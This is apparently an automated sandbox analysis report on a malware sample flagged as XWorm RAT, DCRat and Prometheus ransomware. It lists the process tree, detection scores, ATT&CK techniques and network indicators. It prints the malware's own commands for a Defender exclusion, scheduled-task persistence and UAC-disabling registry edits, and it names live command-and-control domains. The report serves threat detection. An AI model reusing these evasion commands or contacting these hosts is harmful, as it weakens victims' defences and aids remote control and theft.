              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Users\user\Desktop\cougif6lqM.exe | Process created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe"
              Source: C:\Users\user\Desktop\cougif6lqM.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
              Source: C:\Componenthost\providerreviewdhcp.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
              Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F1ED5B cpuid 3_2_00F1ED5B
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 3_2_00F1A63C
              Source: C:\Users\user\Desktop\cougif6lqM.exe | Queries volume information: C:\Users\user\Desktop\cougif6lqM.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\javaclient.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Componenthost\providerreviewdhcp.exe | Queries volume information: C:\Componenthost\providerreviewdhcp.exe VolumeInformation
              Source: C:\Componenthost\providerreviewdhcp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\cmd.exe | Queries volume information: C:\Users\user\cmd.exe VolumeInformation
              Source: C:\Users\user\cmd.exe | Queries volume information: C:\Users\user\cmd.exe VolumeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe VolumeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Queries volume information: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Queries volume information: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe VolumeInformation
              Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F1D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 3_2_00F1D5D4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0ACF5 GetVersionExW, 3_2_00F0ACF5
              Source: C:\Users\user\Desktop\cougif6lqM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Componenthost\providerreviewdhcp.exe | Registry value created: PromptOnSecureDesktop 0
              Source: C:\Componenthost\providerreviewdhcp.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001C07C000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3752340914.000000000147C000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3771177110.000000001BFD0000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3752340914.0000000001546000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001C067000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: providerreviewdhcp.exe PID: 7552, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7200, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 1688, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7628, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7312, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 7908, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 7984, type: MEMORYSTR
              Source: Yara match | File source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: javaclient.exe PID: 7396, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED

              Remote Access Functionality

              Source: Yara match | File source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: providerreviewdhcp.exe PID: 7552, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7200, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 1688, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7628, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7312, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 7908, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 7984, type: MEMORYSTR
              Source: Yara match | File source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: javaclient.exe PID: 7396, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts211
              Windows Management Instrumentation
              11
              Scripting
              1
              DLL Side-Loading
              21
              Disable or Modify Tools
              OS Credential Dumping1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Bypass User Account Control
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              11
              Process Injection
              3
              Obfuscated Files or Information
              Security Account Manager37
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              21
              Registry Run Keys / Startup Folder
              1
              Scheduled Task/Job
              24
              Software Packing
              NTDS241
              Security Software Discovery
              Distributed Component Object ModelInput Capture11
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Bypass User Account Control
              Cached Domain Credentials131
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items213
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Behavior Graph

              Behavior Graph ID: 1488678, Sample: cougif6lqM.exe, Startdate: 06/08/2024, Architecture: WINDOWS, Score: 100
                DNS/IP: light-liable.gl.at.ply.gg; a1013249.xsph.ru
                Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures
                Processes started: cougif6lqM.exe; cmd.exe; cmd.exe; 4 other processes

              cougif6lqM.exe
                Dropped: C:\Users\user\AppData\...\javaclient.exe, PE32; C:\Users\user\AppData\...\DCRatBuild.exe, PE32; C:\Users\user\AppData\...\cougif6lqM.exe.log, CSV
                Started: DCRatBuild.exe; javaclient.exe

              cmd.exe
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

              DCRatBuild.exe
                Dropped: C:\Componenthost\providerreviewdhcp.exe, PE32; C:\Componenthost\aZjsojBpBtPKe.vbe, data
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                Started: wscript.exe

              javaclient.exe
                DNS/IP: light-liable.gl.at.ply.gg 147.185.221.17, ports 10314, 49715, 49716, SALSGIVERUS United States
                Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
                Started: powershell.exe; schtasks.exe

              wscript.exe
                Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Started: cmd.exe

              powershell.exe
                Signatures: Loading BitLocker PowerShell Module
                Started: conhost.exe

              schtasks.exe
                Started: schtasks.exe; schtasks.exe; schtasks.exe; 9 other processes

              cmd.exe (started by wscript.exe)
                Started: providerreviewdhcp.exe; conhost.exe

              providerreviewdhcp.exe
                Dropped: C:\Users\user\cmd.exe, PE32; C:\...\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PE32; C:\Recovery\csrss.exe, PE32; 5 other malicious files
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
                Started: cmd.exe

              cmd.exe (started by providerreviewdhcp.exe)
                Started: conhost.exe

              SourceDetectionScannerLabelLink
              cougif6lqM.exe79%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
              cougif6lqM.exe59%VirustotalBrowse
              cougif6lqM.exe100%AviraTR/Dropper.Gen
              cougif6lqM.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Componenthost\providerreviewdhcp.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Avira | VBS/Runner.VPG |
C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Componenthost\aZjsojBpBtPKe.vbe | 100% | Avira | VBS/Runner.VPG |
C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\cmd.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Program Files\Windows Mail\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984 |
C:\Componenthost\providerreviewdhcp.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Joe Sandbox ML | |
C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\javaclient.exe | 100% | Joe Sandbox ML | |
C:\Users\user\cmd.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Windows Mail\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 68% | Virustotal | | Browse
C:\Componenthost\providerreviewdhcp.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Componenthost\providerreviewdhcp.exe | 68% | Virustotal | | Browse
C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | 68% | Virustotal | | Browse
C:\Program Files\Windows Mail\WmiPrvSE.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Program Files\Windows Mail\WmiPrvSE.exe | 68% | Virustotal | | Browse
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | 68% | Virustotal | | Browse
C:\Recovery\csrss.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Recovery\csrss.exe | 68% | Virustotal | | Browse
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | 68% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 70% | ReversingLabs | Win32.Trojan.Uztuby |
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 59% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\javaclient.exe | 92% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT |
C:\Users\user\AppData\Local\Temp\javaclient.exe | 68% | Virustotal | | Browse
C:\Users\user\cmd.exe | 88% | ReversingLabs | Win32.Ransomware.Prometheus |
C:\Users\user\cmd.exe | 68% | Virustotal | | Browse
              No Antivirus matches
Source | Detection | Scanner | Label | Link
bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
a1013249.xsph.ru | 13% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
http://a1013249.xsph.ru/@=UGO0gTOkVjZ | 100% | Avira URL Cloud | malware |
light-liable.gl.at.ply.gg | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 1% | Virustotal | | Browse
http://a1013249.xsph.ru/@=UGO0gTOkVjZ | 3% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
light-liable.gl.at.ply.gg | 147.185.221.17 | true | true | | unknown
a1013249.xsph.ru | 141.8.192.26 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://a1013249.xsph.ru/@=UGO0gTOkVjZ | true | 3%, Virustotal, Browse; Avira URL Cloud: malware | unknown
light-liable.gl.at.ply.gg | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
